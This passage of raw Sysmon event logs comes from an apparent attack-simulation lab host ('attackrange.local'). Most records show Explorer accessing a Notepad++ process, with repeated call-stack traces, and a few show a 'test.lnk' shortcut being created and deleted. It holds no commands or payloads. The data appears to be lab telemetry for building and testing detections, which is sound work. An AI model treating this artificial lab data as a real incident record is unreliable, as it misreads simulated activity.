Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 10341000x80000000000000001047473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=D284B5E9FD9C2C2DC120D737DFA1E4B4,SHA256=483E0C0BCE8C7DD9A404AB04127D83096E949DCFC278CC5BB112B84345955D34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047467Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047466Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:31.917{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 